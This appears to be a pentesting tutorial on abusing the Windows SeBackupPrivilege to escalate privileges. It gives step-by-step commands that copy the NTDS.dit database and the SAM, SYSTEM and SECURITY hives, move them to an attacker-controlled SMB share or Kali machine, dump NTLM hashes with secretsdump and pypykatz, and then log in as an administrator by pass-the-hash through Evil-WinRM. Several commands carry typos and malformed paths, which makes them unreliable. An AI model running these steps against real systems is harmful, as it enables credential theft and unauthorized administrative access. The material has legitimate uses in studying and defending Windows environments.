SeBackUp Privilege

Windows PrivEsc with SeBackupPrivilegeMedium

SeBackupPrivilege allows you to access files that we wouldnt normally have.

Using robocopy we can copy files with the pretext of making backups.

robocopy /b C:\Users\administrator\desktop c:\

gci C:\

We would have access to all the folders inside the administrator' desktop folder.

What could we do?

Well we can create a new directory in which we can just put sam, system and security files.

We then use smbserver from impacket to start our own smb server and run hte following commands.

echo "Y" | wbadmin start backup -backuptarget:\\<our-ip-share\<our-share> -include:c:\windows\ntds

wdadmin get version

The output will show a version identifier take a note of this

echo "Y" | wbadmin start recovery -version:07/16/2022-07:$3 -itemtype:file -items:C\windows\ntds\ntds.dit -recoverytarget:C:\ -norestoreacl

reg save HKLM\SYSTEM c:\system.hive

cp ntds.dit \\<our-smb-share>\<share>\ntds.dit

cp system.hive \\<our-smb-share>\<share>\system.hive

Then we travel to the location of the share

secretsdump.py -ntds ntds.dit -system system.hive LOCAL

Method 2

Exploiting Privilege on Windows 10

Now, we can start the exploitation of this privilege. As we discussed earlier that this privilege allows the user to read all the files in the system, we will use this to our advantage. To begin, we will traverse to the C:\ directory and then move to create a Temp directory. We can also traverse to a directory with the read and write privilege if the attacker is trying to be sneaky. Then we change the directory to Temp. Here we use our SeBackupPrivilege to read the SAM file and save a variant of it. Similarly, we read the SYSTEM file and save a variant of it.

cd c:\mkdir Temp

reg save hklm\sam c:\Temp\sam

reg save hklm\system c:\Temp\system

This means that now our Temp Directory must have a SAM file and a SYSTEM file. Now using the Evil-WinRM download command, we transfer the file from the Temp directory on the target machine to our Kali Linux Machine.

cd Temp

download sam

download system

Now, we can extract the hive secrets from the SAM and SYSTEM file using the pypykatz. If not present on your Kali Linux, you can download it from its GitHub. It is a variant of Mimikatz cooked in Python. So, we can run its registry function and then use the –sam parameter to provide the path to the SAM and SYSTEM files. As soon as the command run, we can see in the demonstration below that we have successfully extracted the NTLM hashes of the Administrator account and other users as well.

pypykatz registry --sam sam system

Now, we can use the NTLM Hash of the raj user to get access to the target machine as a raj user. We again used Evil-WinRM to do this. After connecting to the target machine, we run net user to see that raj user is a part of the Administrator group. This means we have successfully elevated privilege over our initial shell as the aarti user.